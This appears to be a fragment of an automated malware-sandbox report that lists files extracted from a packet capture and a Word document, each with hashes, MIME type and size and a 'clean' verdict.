SHA256 bc8b832fd2a68c177d4f5ecee42000ae6255a8445a53c6f1a4d3817226df73a2
SSDeep 3:+OM:E
ImpHash -
a9f28f5c27f1d7a35858036a7775bec833b424362ebe7b630168cd096f9b1a60 Downloaded File Text
clean
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 c18225e887620261d030e03f1b24e45e
SHA1 2e1b7915bb56884f6e5508e9e5377c014672915f
SHA256 a9f28f5c27f1d7a35858036a7775bec833b424362ebe7b630168cd096f9b1a60
SSDeep 3:W33T:CT
ImpHash -
99050ff7c9cd2eeb52103a3ebb1bdbbf2daad4cec2e31f09c397a1a9a93a58c7 Downloaded File Text
clean
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 c72ea6c3295a5cab90848053e3760b95
SHA1 909439d196c86d9b0fadcab22da30427c4490a3c
SHA256 99050ff7c9cd2eeb52103a3ebb1bdbbf2daad4cec2e31f09c397a1a9a93a58c7
SSDeep 3:1n+UnS1:1nZM
ImpHash -
cfa5f5b6696abeb299fa0621b62c56c14aaa2d367a0583933472f007a885874f Downloaded File Text
clean
Parent File analysis.pcap
MIME Type text/plain
File Size 12 Bytes
MD5 f589706747a771e7e57badb242b19d5f
SHA1 56f9a642338ce6f887a572d05be3ea8adceda7e2
SHA256 cfa5f5b6696abeb299fa0621b62c56c14aaa2d367a0583933472f007a885874f
SSDeep 3:+kG:+kG
ImpHash -
0.PNG Embedded File Image
clean
Parent File C:\Users\kEecfMwgj\Desktop\0524_4109399728218.doc
MIME Type image/png
File Size 551.13 KB
MD5 5c34c341901cf35b8875d038cd4f6f26
SHA1 bef7e126da29a0e68e2569a392bb9c0b1e117624
SHA256 90229e3b878f46a7e4a2b4e89558a450d8e21578b8e57c993e3ad638df532041
SSDeep 12288:wBGIkqrPfcaphDrGv2YileZ93/seZgDFj+7oUOp7VKs+LBm:wEIjrPUaphvGvGUZ93/semhXp7AsWm
ImpHash -
2.EMF Embedded File Stream
clean
Parent File C:\Users\kEecfMwgj\Desktop\0524_4109399728218.doc
MIME Type application/octet-stream
File Size 4.85 KB
MD5 511ef60e1f58994de2f954faece5383f
SHA1 f0e2e52ad5b55758760ea475892ebf3c9085d333
SHA256 5f9b76346c88e6aa464b68e994dd0f9edd321c40b7937233c589ec8751f4fb97
SSDeep 48:FUD3hNZtbmsdBg6qjpLkwOEG6kpnydHk7al:mTZtLBFq9gV+EM
ImpHash -